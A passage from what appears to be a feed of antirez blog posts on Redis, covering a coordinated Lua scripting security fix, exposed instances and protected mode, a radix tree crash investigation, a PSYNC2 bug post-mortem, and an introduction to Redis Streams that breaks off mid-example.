Thanks to the cooperation and friendly communications between the Apple Information Security team, me, and the Redis cloud providers, I tried to coordinate the release of the vulnerability after contacting all the major Redis providers out there, so that they could patch their systems before the bug was published. I provided a single patch, so that the providers could easily apply it to their systems. Finally between yesterday and today I prepared new patch releases of Redis 3, 4 and 5, with the security fixes included. They are all already released if you are reading this blog post. Unfortunately I was not able to contact smaller or newer cloud providers. The effort to handle the communication with Redis Labs, Amazon, Alibaba, Microsoft, Google, Heroku, Open Redis and Redis Green was already massive, and the risk of leaks extending the information sharing with other subjects even higher (every company included many persons handling the process). I’m sorry if you are a Redis provider finding about this vulnerability just today, I tried to do my best.

I want to say thank you to the Apple Information Security team and all the other providers for the hints and help about this issue.

# The problem with Lua

Honestly when the Redis Lua engine was designed, it was not conceived with this security model of the customer VS the cloud provider in mind. The assumption kinda was that you can trust who pokes with your Redis server. So in general the Lua libraries were not scrutinized for security. The feeling back then was, if you have access to Redis API, anyway you can do far worse.

However later things evolved, and cloud providers restricted the API of Redis to expose to their customers, so that it was possible to provide managed Redis instances. However while things like the CONFIG or DEBUG commands were denied, you can’t really avoid exposing EVAL and EVALSHA. The Redis Lua scripting is one of the top used features in our community.

So gradually, without me really noticing, the Lua libraries became also an attack vector in a security model that should instead be handled by Redis, because of the changing system in the way Redis is exposed and provided to the final user. As I said, in this model more than the Redis user, is the managed Redis “cloud” provider to be affected, but regardless it is a problem that must be handled.

What we can do in order to improve the current state of cloud providers security, regarding the specific problem with Lua scripting? I identified a few things that I want to do in the next months.

1. Lua stack protection. It looks like Lua can be compiled, with some speed penalty, in a way that ensures that it is not possible to misuse the Lua stack API. To be fair, I think that the assumptions Lua makes about the stack are a bit too trivial, with the Lua library developer having to constantly check if there is enough space on the stack to push a new value. Other languages at the same level of abstraction have C APIs that don’t have this problem. So I’ll try to understand if the slowdown of applying more safeguards in the Lua low level C API is acceptable, and in that case, implement it.

2. Security auditing and fuzz testing. Even if my time was limited I already performed some fuzz testing in the Lua struct library. I’ll continue with an activity that will check for other bugs in this area. I’m sure there are much more issues, and the fact that we found just a given set of bugs is only due to the fact that there was no more time to investigate the scripting subsystem. So this is an important activity that is going to be performed. Again at the end of the activity, I’ll coordinate with the Redis vendors so that they could patch in time.

3. From the point of view of the Redis user, it is important that when some untrusted data is sent to the Lua engine, an HMAC is used in order to ensure that the data was not modified. For instance there is a popular pattern where the state of an user is stored in the user cookie itself, to be later decoded. Such data may later be used as input for Redis Lua functions. This is an example where an HMAC is absolutely needed in order to make sure that we read what we previously stored.

4. More Lua sandboxing. There should be plenty of literature and good practices about this topic. We already have some sandboxing implemented, but my feeling from my security days, is that sandboxing is ultimately always a mouse and cat game, and can never be executed in a perfect way. CPU / memory abuses for example may be too complex to track for the goals of Redis. However we should at least be sure that violations may result in a “graceful” abort without any memory content violation issue.

5. Maybe it’s time to upgrade the Lua engine? I’m not sure if newer versions of Lua are more advanced from the point of view of security, however we have the huge problem that upgrading Lua will result in old script potentially no longer working. A very big issue for the Redis community, especially since, for the kind of scripts Redis users normally develop, a more advanced Lua version is only marginally useful.

# The issues

The problems fixed are listed in the following commits:

ce17f76b Security: fix redis-cli buffer overflow.
e89086e0 Security: fix Lua struct package offset handling.
5ccb6f7a Security: more cmsgpack fixes by @soloestoy.
1eb08bcd Security: update Lua struct package for security.
52a00201 Security: fix Lua cmsgpack library stack overflow.

The first commit is unrelated to this effort, and is a redis-cli buffer overflow that can be exploited only passing a long host argument in the command line. The other issues are the problems that we found on cmsgpack and the struct package.

The two scripts to reproduce the issues are the following:

https://gist.github.com/antirez/82445fcbea6d9b19f97014cc6cc79f8a

and

https://gist.github.com/antirez/bca0ad7a9c60c72e9600c7f720e9d035

Both authored by the Apple Information Security team. However the first was modified by me in order to make it more reliably causing the crash.

# Versions affected

Basically every Redis with Lua scripting is affected.

The fixes are available as the following Github tags:

3.2.12
4.0.10
5.0-rc2

The stable release (4.0.10) is also available at http://download.redis.io as usually.

Releases tarball hashes are available here:

https://github.com/antirez/redis-hashes

Please note that the versions released also include different other bugfixes, so it’s a good idea to also read the release notes to know what other things you are upgrading by switching to the new version.

I hope to be back with a blog post in the future with the report of the security auditing that is planned for the Lua scripting subsystem in Redis. Comments]]>
http://antirez.com/news/119
Clarifications on the Incapsula Redis security report http://antirez.com/news/118 http://antirez.com/news/118 Sat, 02 Jun 2018 17:52:39 +0000
[1] https://www.incapsula.com/blog/report-75-of-open-redis-servers-are-infected.html

Many folks don’t need any clarification about all this, because if you have some grip on computer security and how Redis works, you can contextualize all this without much efforts. However I’m writing this blog post for two reasons. The obvious one is that it can help the press and other users that are not much into security and/or Redis to understand what’s going on. The second is that the exposed Redis instances are a case study about safe defaults that should be interesting for the security circles.

The Incapsula report
===

Let’s start with the Incapsula report. What they did was to analyze exposed Redis instances on the internet. Instances that everybody from any place of the internet can access, because they are listening for connections in a public IP address, without any password protecting them. It is like if they were HTTP servers, but it’s Redis instead, that is not designed to be left exposed.

This is far from a new story. Because of Redis popularity the number of total Redis installations is pretty huge, and a fraction of these installations are left exposed. It’s like that since the start basically. People spin a virtual machine in some cloud provider, install Redis, find that they cannot access it, open the port of the VM to anyone, and the instance is at this point running unprotected. They only thing that changed is that most of those instances in the past were left running unaffected in many cases. Maybe some script kiddie could connect and call “INFO” or a few more commands to check what there was inside, and that was it most of the times. Now the new crypto mining obsession is providing attackers a very good reason to break into other people’s systems. Actually the best of the reasons: money. So the same exposed instances are now cracked in order to install some software to mine some kind of crypto currency. Incapsula checked the percentage of instances that look violated.

The way they collected the kind of attacks used against Redis instances was by running, on purpose, a set of exposed instances, to monitor how the attackers could target them. Many of the attacks look like variations on my own example attack [2].

[2] http://antirez.com/news/96

Also it is worth to note that to scan the IPv4 address space in order to find exposed instances of any kind of service is trivial. You could use, for instance, masscan. However you could do that 20 years ago using my own hping, and I remember doing this back then with success indeed.

TLDR: there are open Redis instances on the internet because they are misconfigured. Attackers profit from them by installing some kind of mining software, or for other reasons. But there is more… keep reading.

Protected mode
===========

Security is a terrible field in my opinion. I worked in such field, and decided to go away once it started to be no longer an underground affair. People are very opinionated about security issues, while, at the same time, there is little real care about, for instance, performing security auditings on real world systems (something that Google project zero is changing a bit, btw). So after receiving for the Nth time some PGP encrypted email saying that Redis was vulnerable to a temp file creation attack, I wrote the blog post at [2], just to tell: “maybe you are missing the point of Redis security”. I basically published an attack against my own system that I could find in a few minutes of research, and that was very serious. The message was, again, Redis is not designed to be left exposed. And if you really want to play hack3rzzz look, there are more interesting things to do. However by doing that I put on the hands of script kiddies a great weapon to break into thousands of Redis instances open everywhere.

In order to pay back from my fault, in an attempt to atone my sin, I started to think about what I could do to make the situation simpler. One problem of Redis 3.x was that by default it would listen to all the IP addresses, so it was simple to misconfigure: just open the port, or have no firewalling at all, and the instance is exposed. The security mantra about that was “run with safe defaults”. That is, in the case of Redis, a networked cache, to have a default configuration that basically more or less does not work for most real world users out of the box. And what was worse, people that don’t have a clue would just “bind *” to fix the problem, and we are back at the initial condition. So I tried to find something a bit smarter, a feature that I named “protected mode”, with great disappointment of a group of 386 processors that manifested in front of my houses for days.

The idea of protected mode is to listen to every address, but if the connection is not local, the server replies with an error explaining *why* it is not working as expected, what to do, and the risks involved in just doing the silly thing of opening the instance to everybody by disabling protected mode. This is an example of how the feature works:

$ nc 192.168.1.194 6379
-DENIED Redis is running in protected mode because protected mode is enabled, no bind address was specified, no authentication password is requested to clients. In this mode connections are only accepted from the loopback interface. If you want to connect from external computers to Redis you may adopt one of the following solutions: 1) Just disable protected mode sending the command 'CONFIG SET protected-mode no' from the loopback interface by connecting to Redis from the same host the server is running, however MAKE SURE Redis is not publicly accessible from internet if you do so. Use CONFIG REWRITE to make this change permanent. 2) Alternatively you can just disable the protected mode by editing the Redis configuration file, and setting the protected mode option to 'no', and then restarting the server. 3) If you started the server manually just for testing, restart it with the '--protected-mode no' option. 4) Setup a bind address or an authentication password. NOTE: You only need to do one of the above things in order for the server to start accepting connections from the outside.

The advantage here is that:

1. The user knows what to do in order to fix this situation. It’s much better than “connection refused”.

2. We try to avoid that the user disables protected mode without understanding what is the risk involved, and that there are other solutions (setting a password or binding to certain interfaces).

Disillusion
========

So my illusion was that, maybe, it could be more helpful than the safe defaults. But unfortunately you can’t fix the fact that a percentage of users just don’t care, that some don’t even know they are installing Redis, and that it’s there just as a side effect of being a dependency for something else, or is installed by a script, or is included in the ABI image you are running and so forth.

Initially by grepping on Shodan it looked like Redis 4.0 protected mode was, actually, helping quite a lot! The open instances I could find replied “-DENIED” for the most part. That was great. However after the publication of [1] I asked Shodan (btw they rock and were super helpful on Twitter) if I could have the version breakdown of the exposed Redis instances. And the result is, there are still tons of Redis 4.0 instances exposed [3].

[3] https://asciinema.org/a/8heQvivQkFmUrisbb9FQLfMBj

It is true that they are less than the 3.0 instances, but they are still a lot. By investigating more I was even told that there are VM images where Redis protected mode is *removed* by the installation script by default, since sometimes people are annoyed by security features. They want things to just work over the network out of the box, so this is what they do, remove the annoyance. Then such image becomes popular, and many folks install it without knowing what’s going on, and when Redis 4 is installed protected mode is off and the instance is exposed.

I think this is a lesson about safe defaults that can be trivially disabled by users. It looks like that in some way they could help, but just in reducing by some percentage the number of incidents, not to make them a rare exception.

What’s next?
=========

One of the fundamental problems in the Redis security model is that the server can be reconfigured via the normal API, using special commands like the CONFIG command. This is a very valuable feature of Redis, but it makes much simpler to break into the instance once you have access to the Redis API, and normal applications using Redis don’t need this level of access.

So in the course of Redis 6, what will happen is that we’ll introduce ACLs. Again, the way this feature will be introduced will try to be a “no pain” experience for existing users. If you connect without any credential, Redis will log in the client automatically using the “default” user, that can do everything applications normally do, but will deny all the administrative commands. Of course it will be possible to make it more strict by configuring things differently, create new users that can only call certain commands on keys matching a given pattern, and so forth.

In the course of Redis 6 we plan to also merge support for SSL connections, while this is unlikely to have any impact on the issue discussed here, because by default Redis will run unencrypted and the feature will be opt-in, however SSL is also one step forward for a more secure Redis experience in certain environments.

However my hopes are on ACLs, because it looks unlikely that the casual user will make the default account able to run the administrative commands. Especially because we plan to log connections originating from the local host as the “admin” user directly. If this goes as I hope, we’ll continue to see Redis 6 instances exposed, because it is inevitable, but at least those Redis 6 instances should make it harder to compromise the whole system. At least in theory: Redis EVAL command allows execution of Lua scripts, and such feature should be allowed by default since is a fundamental Redis feature. We try to have a kinda sandboxed Lua execution environment, but if you followed IT security for some time, you know that sandboxes are always imperfect, and more an exercise in finding how to escape them than a sealing solution. This time however I’ll avoid publishing an attack just to make a point. Comments]]>
http://antirez.com/news/118
A short tale of a read overflow http://antirez.com/news/117 http://antirez.com/news/117 Wed, 07 Feb 2018 20:30:39 +0000
When a long running process crashes, it is pretty uncool. More so if the process happens to take a lot of state in memory. This is why I love web programming frameworks that are able, without major performance overhead, to create a new interpreter and a new state for each page view, and deallocate every resource used at the end of the page generation. It is an inherently more reliable programming paradigm, where memory leaks, descriptor leaks, and even random crashes from time to time do not constitute a serious issue. However system software like Redis is at the other side of the spectrum, a side populated by things that should never crash.

Months ago I received a crash report from my colleague Dvir Volk. He was developing his RediSearch Redis module, so it was not clear if the crash was due to a programming error inside the module, perhaps corrupting the heap, or a bug inside Redis. However it looked a lot like a real problem into the radix tree implementation:

=== REDIS BUG REPORT START: Cut & paste starting from here ===
# Redis 999.999.999 crashed by signal: 11
# Crashed running the instuction at: 0x7fceb6eb5af5
# Accessing address: 0x7fce9c400000
| Backtrace:
| redis-server *:7016 [cluster](raxRemoveChild+0xd3)[0x49af53]
| redis-server *:7016 [cluster](raxRemove+0x34f)[0x49b34f
| redis-server *:7016 [cluster](slotToKeyUpdateKey+0x1ad)[0x4415dd]

The radix tree is full of memmove() calls, and Redis crashed exactly trying to access a memory address that was oddly zero padded at the end: 0x7fce9c400000. My first thought was, I’m sure I’m doing some wrong memory movement here, and the address gets overwritten with zeroes, leading to the crash when the program attempts the deference the address.

I’m pretty proud about my radix tree implementation. Not because of the implementation itself, while it’s a complex data structure to implement, it’s not rocket science. But because of the fuzz tester that comes with it and is able to cover the whole source code (trivial) and a lot of non trivial state (that’s definitely more interesting). The fuzz tester does not do fuzzing just to reach a crash, it compares the implementation of the radix tree dictionary and iterator with a reference implementation that uses an hash table and qsort, to have exactly the same semantics, but in a short and easy to audit implementation. After receiving the crash report I improved the fuzz tester, ran it for days, with and without Valgrind, wrote additional data models, created tests using 100 millions of keys, but despite the efforts I could not reproduce the crash. A few days ago I would discover that there was no bug in the implementation I was testing, but at the time I was not aware of that. I could simply never find a bug that was not there. So after failing to reproduce I gave up.

One week ago I received two other additional bug reports that were almost the same. And again, the addresses were zero padded.

Dvir crash: Accessing address: 0x7fce9c400000
Issue 4605: Accessing address: 0x7f2959e00000
Issue 4642: Accessing address: 0x7f0e9b800000

It was time to read every memmove, memcpy, realloccall inside the source code, trying to figure out if there was something wrong that for some reason the fuzz tester was not able to catch. I found nothing, but then inspecting the Redis crash report I noticed something funny. During crashes Redis reports the memory mapped areas of the process, things like the following:

*** Preparing to test memory region 7f0e8c400000 (255852544 bytes)

Now, if you add 255852544to 0x7f0e8c400000, the result is 0x7f0e9b800000 , which is exactly the accessed address in the crash reported in issue 4642. So the program was not crashing because the memory address was corrupted, but because it was accessing an address immediately after the end of the heap. I checked the other issues, and the same was true in all the instances. Basically the end of the heap, at the edge of the start of unmapped addresses, was acting as a memory guard in order to detect and crash when an access was performed outside the bounds. This is a common technique that certain C memory sanitation tools used to employ in the past. Such tools would provide a drop in replacement formalloc() that would return addresses allocated at the edge of a non accessible memory page. Every overflow would be immediately detected in this way.

Because the program would crash only in that case, when deallocating a radix tree node at the end of the heap, it was simple to realize that the problem was a read overflow. You can never detect a read overflow otherwise: it will just access data outside your structure, but inside mapped memory, so the bug would be totally harmless and silent, with the exception of doing the same operations at the end of the mapped region. Finally I had a clear place where to look, this portion of C code:

/* 3. Remove the edge and the pointer by memmoving the remaining children pointer and edge bytes one position before. */
int taillen = parent->size - (e - parent->data) - 1;
debugf("raxRemoveChild tail len: %d\n", taillen);
memmove(e,e+1,taillen);
/* Since we have one data byte less, also child pointers start one byte before now. */
memmove(((char*)cp)-1,cp,(parent->size-taillen-1)*sizeof(raxNode**));
/* Move the remaining "tail" pointer at the right position
as well. */
size_t valuelen = (parent->iskey && !parent->isnull) ? sizeof(void*) : 0;
memmove(((char*)c)-1,c+1,taillen*sizeof(raxNode**)+valuelen);
/* 4. Update size. */
parent->size--;

I asked the user to send me the redis-server binary that produced the crash report, and reading the disassembled code it was clear that many CPU registers, also included in the Redis crash report, would be still populated with the variables above! Note that the CPU registers RDI, RSI, RDX are used in order to pass the first three arguments to memmove. In one of the crashes we had:

parent = RBP = 7f2959dffff
Checking RDI, RSI, RDX we extract the memmove() arguments:
memmove(00007f2959dffff4,00007f2959dffffd,0000000000000008);
The memmove will go out of bound accessing up to 7f2959e00004.

So I had my proof. But there was more, checking other registers I could also reconstruct the node header, in order to understand how the memmove count argument was obtained. Something was definitely wrong there. Basically I was seeing that the disassembled executable did not match the C function I was reading. How was that possible? The read over the buffer should not happen, because the state was sane. Only the count was incorrectly computed by the crashing instance. It was night, and I had worked at this damn thing for two days no stop, so I decided to create a gist and post it on Twitter, to see if somebody could explain how such C would be turned into such assembler by the compiler.

I was lucky enough that my friend Fedor Indutny of Node.js fame was willing to help. He quickly realized that it was very clear why the C and the assembler could not match: what I was analyzing was not the right C code… but a newer version of the same function. Fedor had a GCC 5.4.0 at hand, the same compiler used by the user reporting the bug, so he tried to compile an older version of the code with it, realizing that now the two versions of the emitted code matched perfectly. He pinged me about it, asking if I was sure that this was a recent Redis version. I was absolutely sure, it was Redis 4.0.6. But then I started to have a few doubts, and I took a diff of rax.c between the Redis unstable branch and Redis 4.0. What happened was that I fixed this bug about ten months ago, in the course of the Streams implementation. During the cherry picking activity, where bugfixes from unstable are backported to Redis 4.0, the fix was inside a commit about streams, so I was constantly skipping it. Everything was finally clear, I had debugged for days a bug that was not there in the version that I was testing.

If it was just a lame mistake from me, why I did bother to write this blog post? Because, I believe, there are lessons to be learned from all this.

The first lesson is that crash reports like the ones Redis is able to emit are a key asset in system software. They allow to reconstruct the state of bugs that you are not able to replicate, but happen very rarely on the wild. While the bug was already fixed, I was able to exactly understand what was happening just looking at the bug reports, register dumps, offending address, and call stack.

The second lesson is that you should learn AMD64 assembler today, at least to read comfortably code emitted by the compiler and follow what is happening, if you want to get involved in system programming. This is often the only way to understand what is happening during an heisenbug. Debuggers won’t help much. GDB was claiming that the crash was happening in the instruction parent->size-- which is, of course impossible. But GDB is not to blame, modern compilers, with optimizations turned on, generate code that can hardly be matched back to the source code.

Another lesson is how powerful well done fuzz testing is. The fuzz tester was immediately able to find the bug in the broken version. Similarly the fact that no radix tree crash was never observed other than this bug fixed a long time ago, speaks for itself. The radix tree implementation is very complex, yet thanks to fuzz testing there are apparently no bugs in the implementation which is so new and so complex. I want to stress the importance of doing fuzzing not just to find crashes: that’s good for security people that want to discover zero days. Fuzzing for system software should perform random operations according to a sane operation model, and compare the outcome with a reference implementation.

And finally, there is a clear lesson for me: next time I need to be more carefully when working at a feature branch and making fixes that are not specific of the feature branch. I was working under the feeling that I would merge everything back into 4.0 ASAP. Then it was not the case, and putting the radix tree update into the same commit implementing Stream things was a fatal error.

Well, bonus point, having smart friends help :-) I was a bit lost at that point, and the kind help of Fyodor helped realize the last part of the puzzle and quickly move forward. Don’t be afraid to ask for help. If you get involved in system software, remember that it is very different than other fields in programming. It’s not just that you do some work and you can bring things forward. You must be prepared to spend days trying to understand why a bug happened, a bug that often you are not able to reproduce, because users deserve more than software crashing like that. Comments]]>
http://antirez.com/news/117
An update on Redis Streams development http://antirez.com/news/116 http://antirez.com/news/116 Thu, 25 Jan 2018 18:00:34 +0000
To start, in this moment Streams are my main priority: I want to finish this work that I believe is very useful in the Redis community and immediately start with the Redis Cluster improvements plans. Actually the work on Cluster has already started, with my colleague Fabio Nicotra that is porting redis-trib, the Cluster management tool, inside the old and good redis-cli. This step involves translating the code from Ruby to C. In the meantime, a few weeks ago I finished writing the Streams core, and I deleted the “streams” feature branch, merging everything into the “unstable” branch.

Later I reviewed again, several times actually, the specification for consumer groups. A few weeks ago I finally was happy with the result, so I started the implementation of this specification: https://gist.github.com/antirez/68e67f3251d10f026861be2d0fe0d2f4. Be aware that command names changed quite a bit… With the API being more like this: https://gist.github.com/antirez/4e7049ce4fce4aa61bf0cfbc3672e64d.

I’m halfway, after the first 500 lines of code I today was able to see clients using the XREADGROUP command to see only their local history when fetching old messages. This was a milestone in the implementation. Also XACK is now available. Basically all the data structures supporting the streams consumer groups are working, but I need to finish all the commands implementations, support the blocking operations in XREADGROUP and so forth, handle replication, RDB and AOF persistence. More or less in one month I should have everything ready.

Because of consumer groups, the RDB format of the Streams is going to change a lot compared to what “unstable” is using right now. And since there is to break compatibility, we’ll also add the ability of RDB files to persist information about keys last access, so that a Redis restart (or slave loading) involving RDB will get all the info needed in order to continue doing the eviction of keys in the correct way. Right now all that information would be lost instead. Because of this radical RDB changes the plan changed a bit: Streams are going to appear in Redis 5.0 and not 4.0, but 5.0 will be released as GA in about two months: this is possible because 5.0 will be just a 4.0 plus streams, no other major features inside, if not for the RDB changes…

So TLDR: I’m working to Streams almost full time, if not for some time to check PRs / Issues for critical stuff, and in two months if you upgrade to Redis 5.0 you’ll have production ready streams with consumer groups fully implemented. There is also quite of a documentation effort to perform, I’ll write both the command manuals and an extensive introduction to streams once we go RC1, which is in about one month, so that people will have documentation to support their tests during the release candidate stage.

I hope this clarifies what’s happening with Streams. See you soon with Redis 5.0 :-) Comments]]>
http://antirez.com/news/116
Redis PSYNC2 bug post mortem http://antirez.com/news/115 http://antirez.com/news/115 Sat, 02 Dec 2017 14:44:32 +0000
All this is good news from the point of view of Redis operations, however while PSYNC2 was pretty solid since the introduction in Redis 4.0.0 stable, the feature involving a restarting slave was definitely lacking reliability. There were two problems with this feature: the first being that it was a last-minute addition to PSYNC2, and was not part of the original design document. It was more like an obvious extension of the work we did in PSYNC2, but was not scrutinized at the same level of the rest of the specification for potential bugs and issues. The second problem was due to the fact that the feature is more complex than it looks like initially, for the fact that it’s tricky to really restore *all* the state the replication has in the slave side after a restart. Moreover, failing to restore certain bits of the state, does not result in evident bugs most of the times, so they are hard to spot via integration testings. Only once specific conditions happen the lack of some state will result in problems. For instance failing to correctly reconstruct the currently selected DB in the slave replication state, will create problems only when there are writes happening in different Redis DBs, and such bug would not store correctly the currently selected DB only under special conditions.

Thanks to the help of many Redis contributors, but especially thanks to the @soloestoy Github user, a Redis developer at Alibaba, recently we worked at improving a number of PSYNC2 potential issues. All the work done would finally end inside Redis 4.0.3 in a few days, after much testing of all the patches wrote so far. However once I received issue #4483, I understood I had to rush the release of Redis 4.0.3 because this was far more serious than the other Redis 4 PSYNC2 issues that we had discovered up to that point.

The bug described in issue #4483 was fairly simple, yet very problematic. After a slave restart and a resulting reloading of the replication state from the RDB, the master replication backlog could contain Lua scripts executions in the form of EVALSHA commands. However the slave Lua scripting engine is flushed of all the scripts after the restart, so is not able to process such commands. This results in the slave not processing writes originated by Lua scripts, unless such scripts were using “commands replication”, which is not the default. The default is to replicate the script itself.

I went a bit in panic mode… and wrote a few alternative patches that I submitted to the issue. At the end the one that did not require RDB incompatibilities with older versions was picked, so I went ahead and released Redis 4.0.3 ASAP. However I did a mistake… It’s a few weeks that I work from an office instead of working from home. Normally I do not work at night, but for 4.0.3, when I returned back home, I opened my home laptop and merged the patch into the 4.0 branch, and did some testing activity. The next day when I returned to the office, I continued working from another computer, but I did not realize that I was missing one commit that I merged at home, without pushing it to the repository.

So I basically released a 4.0.3 that had all the PSYNC2 fixes minus the most important one for the replication bug. I released ASAP a new patch level version, Redis 4.0.4, including the replication fix. This was already not great: upgrading Redis is a scheduled activity, and nobody wants to upgrade two times because I make errors in preparing the release… But the worst was yet to happen. The fix that I added in 4.0.4, the one about scripts replication in restarting slaves performing PSYNC2, had an error that passed totally unnoticed through all the replication integration tests: the fix involved storing the Lua scripts in the slave memory directly into the RDB, in order to reload them later. However it was not considered that the function loading the scripts, would assert if the script was already in memory, so when a slave received a full synchronization from a master, it started to load the RDB file, crashing immediately because of some duplicated script that was already in memory. A user reported it ASAP via Twitter, and I fixed the problem in less than 45 minutes, from the reporting moment to the 4.0.5 availability, but this does not mitigate all the potential problems that this sequence of failures at delivering a fix caused.

The above problems were caused by a number of reasons:

1. Redis 4.0 was delivered as stable too early, considering the complexity and the amount of code change in PSYNC2. The next time, even at the cost of delaying releases, I’ll wait more and will take the new major versions of Redis more time in the last release candidate, so that we can find such bugs before shipping a GA version.

2. I rushed too much trying to deliver a fix for issue #4483. Even if the bug was critical, it was better to spend some time in order to check what was happening, and the potential problems caused by the fix itself. Moreover I was so much in a hurry that I did not check the set of commits composing 4.0.3 with enough care, causing the lack of one of the fixes, and the need for a new release.

3. While Redis 4.0 has very strict PSYNC2 unit and integration tests, including tests that simulate continuous failovers checking data consistency at every step, because of this bug I discovered that the tests never try to mix PSYNC2 with replication of Lua scripts. This must be improved. Also the PSYNC2 replication after slave RDB restart must be enhanced as well.

I’ll start with the improvements at “3”, and in the future I’ll consider the lessons at “1” and “2” before every new release. My sincere apologize to everybody that had to deal with my errors in this instance, and a big thank you to @soloestoy for an incredible amount of help and support. Comments]]>
http://antirez.com/news/115
Streams: a new general purpose data structure in Redis. http://antirez.com/news/114 http://antirez.com/news/114 Mon, 02 Oct 2017 15:12:35 +0000
However, at the same time, there was a problem in Redis, that was not taking me relaxed about the data structures exported by default. There is some kind of gap between Redis lists, sorted sets, and Pub/Sub capabilities. You can kindly use all these tools in order to model a sequence of messages or events, but with different tradeoffs. Sorted sets are memory hungry, can’t model naturally the same message delivered again and again, clients can’t block for new messages. Because a sorted set is not a sequential data structure, it’s a set where elements can be moved around changing their scores: no wonder if it was not a good match for things like time series. Lists have different problems creating similar applicability issues in certain use cases: you cannot explore what is in the middle of a list because the access time in that case is linear. Moreover no fan-out is possible, blocking operations on list serve a single element to a single client. Nor there was a fixed element identifier in lists, in order to say: given me things starting from that element. For one-to-many workloads there is Pub/Sub, which is great in many cases, but for certain things you do not want fire-and-forget: to retain a history is important, not just to refetch messages after a disconnection, also because certain list of messages, like time series, are very important to explore with range queries: what were my temperature readings in this 10 seconds range?

The way I tried to address the above problems, was planning a generalization of sorted sets and lists into a unique more flexible data structure, however my design attempts ended almost always in making the resulting data structure ways more artificial than the current ones. One good thing about Redis is that the data structures exported resemble more the natural computer science data structures, than, “this API that Salvatore invented”. So in the end, I stopped my attempts, and said, ok that’s what we can provide so far, maybe I’ll add some history to Pub/Sub, or some more flexibility to lists access patterns in the future. However every time an user approached me during a conference saying “how would you model time series in Redis?” or similar related questions, my face turned green.

Genesis
=======

After the introduction of modules in Redis 4.0, users started to see how to fix this problem themselves. One of them, Timothy Downs, wrote me the following over IRC:

the module I'm planning on doing is to add a transaction log style data type - meaning that a very large number of subscribers can do something like pub sub without a lot of redis memory growth
subscribers keeping their position in a message queue rather than having redis maintain where each consumer is up to and duplicating messages per subscriber

This captured my imagination. I thought about it a few days, and realized that this could be the moment when we could solve all the above problems at once. What I needed was to re-imagine the concept of “log”. It is a basic programming element, everybody is used to it, because it’s just as simple as opening a file in append mode and writing data to it in some format. However Redis data structures must be abstract. They are in memory, and we use RAM not just because we are lazy, but because using a few pointers, we can conceptualize data structures and make them abstract, to allow them to break free from the obvious limits. For instance normally a log has several problems: the offset is not logical, but is an actual bytes offset, what if we want logical offsets that are related to the time an entry was inserted? We have range queries for free. Similarly, a log is often hard to garbage collect: how to remove old elements in an append only data structure? Well, in our idealized log, we just say we want at max this number of entries, and the old ones will go away, and so forth.

While I was trying to write a specification starting from the seed idea of Timothy, I was working to a radix tree implementation that I was using for Redis Cluster, to optimize certain parts of its internals. This provided the ground in order to implement a very space efficient log, that was still accessible in logarithmic time to get ranges. At the same time I started reading about Kafka streams to get other interesting ideas that could fit well into my design, and this resulted into getting the concept of Kafka consumer groups, and idealizing it again for Redis and the in-memory use case. However the specification remained just a specification for months, at the point that after some time I rewrote it almost from scratch in order to upgrade it with many hints that I accumulated talking with people about this upcoming addition to Redis. I wanted Redis streams to be a very good use case for time series especially, not just for other kind of events and messaging applications.

Let’s write some code
=====================

Back from Redis Conf, during the summertime, I was implementing a library called “listpack”. This library is just the successor of ziplist.c, that is, a data structure that can represent a list of string elements inside a single allocation. It’s just a very specialized serialization format, with the peculiarity of being parsable also in reverse order, from right to left: something needed in order to substitute ziplists in all the use cases.

Mixing radix trees + listpacks, it is possible to easily build a log that is at the same time very space efficient, and indexed, that means, allowing for random access by IDs and time. Once this was ready, I started to write the code in order to implement the stream data structure. I’m still finishing the implementation, however at this point, inside the Redis “streams” branch at Github, there is enough to start playing and having fun. I don’t claim that the API is 100% final, but there are two interesting facts: one is that at this point, only the consumer groups are missing, plus a number of less important commands to manipulate the stream, but all the big things are implemented already. The second is the decision to backport all the stream work back into the 4.0 branch in about two months, once everything looks stable. It means that Redis users will not have to wait for Redis 4.2 in order to use streams, they will be available ASAP for production usage. This is possible because being a new data structure, almost all the code changes are self-contained into the new code. With the exception of the blocking list operations: the code was refactored so that we share the same code for streams and lists blocking operations, with a great simplification of the Redis internals.

Tutorial: welcome to Redis Streams
==================================

In some way, you can think at streams as a supercharged version of Redis lists. Streams elements are not just a single string, they are more objects composed of fields and values. Range queries are possible and fast. Each entry in a stream has an ID, which is a logical offset. Different clients can blocking-wait for elements with IDs greater than a specified one. A fundamental command of Redis streams is XADD. Yes, all the Redis stream commands are prefixed by an “X”.

> XADD mystream * sensor-id 1234 temperature 10.5
1506871964177.0

The XADD command will append the specified entry as a new element to the specified stream “mystream”. The entry, in the example above, has two fields: sensor-id and temperature, however each entry in the same stream can have different fields. Using the same field names will just lead to better memory usage. An interesting thing is also that the fields order is guaranteed to be retained. XADD returns the ID of the just inserted entry, because with the asterisk in the third argument, we asked the command to auto-generate the ID. This is almost always what you want, but it is possible also to force a specific ID, for instance in order to replicate the command to slaves and AOF files.

The ID is composed of two parts: a millisecond time and a sequence number. 1506871964177 is the millisecond time, and is just a Unix time with millisecond resolution. The number after the dot, 0, is the sequence number, and is used in order to distinguish entries added in the same millisecond. Both numbers are 64 bit unsigned integers. This means that we can add all the entries we want in a stream, even in the same millisecond. The millisecond part of the ID is obtained using the maximum between the current local time of the Redis server generating the ID, and the last entry inside the stream. So even if, for instance, the computer clock jumps backward, the IDs will continue to be incremental. In some way you can think stream entry IDs as whole 128 bit numbers. However the fact that they have a correlation with the local time of the instance where they are added, means that we have millisecond precision range queries for free.

As you can guess, adding two entries in a very fast way, will result in only the sequence number to be incremented. We can simulate the “fast insertion” simply with a MULTI/EXEC block:

> MULTI
OK
> XADD mystream * foo 10
QUEUED
> XADD mystream * bar 20
QUEUED
> EXEC
1) 1506872463535.0
2) 1506872463535.1

The above example also shows how we can use different fields for different entries without having to specifying any schema initially. What happens however is that every first message of every block (that usually contains something in the range of 50-150 messages) is used as reference, and successive entries having the same fields are compressed with a single flag saying “same fields of the first entry in this block”. So indeed using the same fields for successive messages saves a lot of memory, even when the set of fields slowly change over time.

In order to retrieve data from the stream there are two ways: range queries, that are implemented by the XRANGE command, and streaming, implemented by the XREAD command. XRANGE just fetches a range of items from start to stop, inclusive. So for instance I can fetch a single item, if I know its ID, with:

> XRANGE mystream 1506871964177.0 1506871964177.0
1) 1) 1506871964177.0
2) 1) "sensor-id"
2) "1234"
3) "temperature"
4) "10.5"

However you can use the special start symbol of “-“ and the special stop symbol of “+” to signify the minimum and maximum ID possible. It’s also possible to use the COUNT option in order to limit the amount of entries returned. A more complex XRANGE example is the following:

> XRANGE mystream - + COUNT 2
1) 1) 1506871964177.0
2) 1) "sensor-id"
2) "1234"
